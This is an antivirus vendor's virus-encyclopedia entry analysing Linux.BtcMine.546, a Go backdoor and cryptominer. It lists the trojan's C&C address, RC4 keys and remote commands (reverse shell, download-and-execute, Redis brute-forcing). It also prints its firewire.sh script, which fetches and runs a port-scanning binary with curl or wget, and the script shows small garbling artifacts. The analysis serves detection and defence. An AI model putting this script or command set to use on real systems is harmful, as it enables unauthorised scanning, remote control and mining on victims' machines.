Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.BtcMine.546

Added to the Dr.Web virus database: 2022-06-09

Virus description added:

sha1

  • e545ceffc8948e3ca9900212807cf3a862d33581

Description

Linux.BtcMine.546 is a trojan backdoor program capable of infecting Linux devices and launching a cryptocurrency miner. This trojan has advanced remote control capabilities. It is implemented as an ELF64 executable file written in Go.

Operating routine

When launched, the trojan checks whether it has been run on the computer before. If it finds a running process, as indicated by the presence of a .lock file, the instance of the trojan that is running is terminated. The trojan then obtains its settings using the envconfig library, which allows it to initialize its configuration based on the environment variables. In particular, envconfig writes the IP address of the C&C server and the flag for enabling the miner into the Specification structure:

struct Specification{
  string Backend;  // IP address of C&C server, string encoded with RC4
  bool Debug;
  bool DisableMi;  // miner activation flag
};

If the IP address of the C&C server is not specified in the configuration, the trojan uses the default address hxxp://185.154.53[.]140. System information, including the operating system name, architecture type, trojan version, number of processor cores, memory size, and other parameters, is sent to the control server. Once this happens, the trojan is ready to receive commands. Note that all traffic between the trojan and the control server is encrypted with the RC4 stream cipher. The following two sequences are used as keys: 2abd6e2c1akl762939453125 and 764153446b61.

List of supported commands

Name Description
scan Initiates a port scan
update Downloads a new version of the trojan and restarts it
exec Runs the command using /bin/sh -c
exec_output Runs the command using /bin/sh -c
Theresult is sent to the C&C server
masscan Creates a firewire.sh script
Runs it
Deletes the script
socks Creates a proxy (SOCKS5)
backconnect Creates a reverse shell
request Sends HTTP requests
tcp Redirects the payload to the target computer
download_and_exec Downloads a file and runs it
The result is sent to the C&C server
The downloaded file is deleted from the system
redisBrute Starts brute forcing the authentication form in Redis
krongo Changes the IP address of the active C&C server
stat Sends information to the C&C server about how much memory the miner is using
mkill Shuts down the miner

List of routes used

Name Description Method
/o Sends results to the server POST
/mg Obtains the PID of the current miner GET
/ms Sends the miner PID POST
/getT Receives additional command information (arguments) POST
/get Obtains a task GET
/s Sends SOCK5 connection data POST
/r Sends the result of the executed command POST
/l Sends log files POST
/h Sends keep-alive packets GET

The firewire.sh script created and executed by the trojan checks the OS distribution information in the /etc/os-release file, determines the type of package manager, looks for the installed libpcap-devel package (a library for low-level network monitoring) and installs it if it is missing.

#!/bin/sh
PORT=$1
RATE=$2
INPUT=$3
OUTPUT=$4
MASSCAN=$5
cat /etc/os-release | grep -vw grep | grep "rhel" >/dev/null
if [ $? -eq 0 ]
    then
        rpm -qa | grep libpcap-dev > /dev/null
        if [[ $? -eq 0 ]]; then
        echo "Package is installed rhel!"
    els'
        echo "Package is NOT installed rhel!"
        yum -y update
        yum -y install  libpcap-devel
    fi
else
    if [ $(dpkg-query -W -f=',27h,'${Status}',27h,' libpcap-dev 2
>/dev/null | grep -c "ok installed") -eq 0 ];
        then
        echo "Package is NOT installed deb!"
        apt-get update
        apt-get install -y libpcap-dev
    else
        echo "Package is installed deb!"
    fi
fi
if [ -x "$(command -v md5sum)" ]; then
    sum=$(md5sum firewire | awk ',27h,'{ print $1 }',27h,')
    echo $sum
    case $sum in
    45a7ef83238f5244738bb5e7e3dd6299)
        echo "firewire OK"
        ;;
    *)
        echo "firewire wrong"
        (curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)
       ;;'
    esac
else
    echo "No md5sum"'
    (curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)
fi
chmod +x firewire
./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2>/dev/null
if [ $? -eq 0 ]
    then
    echo "success"
else
    echo "fail"
    sudo ./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2
>/dev/null
    if [ $? -eq 0 ]
    then
        echo "success2"
    else
        echo "fail2"
    fi
fi

The trojan uses a Go-adapted version of the psutil library to obtain information about running processes: https://github.com/shirou/gopsutil/tree/master.

HTTP requests are processed using the Resty library: https://github.com/go-resty/resty.

Interaction with SOCKS5 proxies is enabled using the go-socks5 package: https://github.com/armon/go-socks5.

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number